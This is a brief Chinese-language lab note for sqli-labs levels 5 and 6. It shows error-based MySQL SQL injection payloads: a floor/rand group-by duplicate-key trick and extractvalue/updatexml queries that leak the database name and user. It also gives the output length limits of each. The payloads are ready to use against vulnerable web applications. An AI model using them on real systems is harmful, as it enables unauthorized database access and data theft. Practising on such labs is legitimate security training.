sqli-lab less-5、6 Double Query

利用报错注入，mysql5.6以上有三种
第一种 利用floor构造重复键group by报错
输出字符长度限制为64个字符

?id=1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+

第二种 updatexml和extractvalue 基于 ~ 符号报错
注意的是这种最多能报32位长度，如果有更多位数请使用字符串截取函数

?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) --+
?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) --+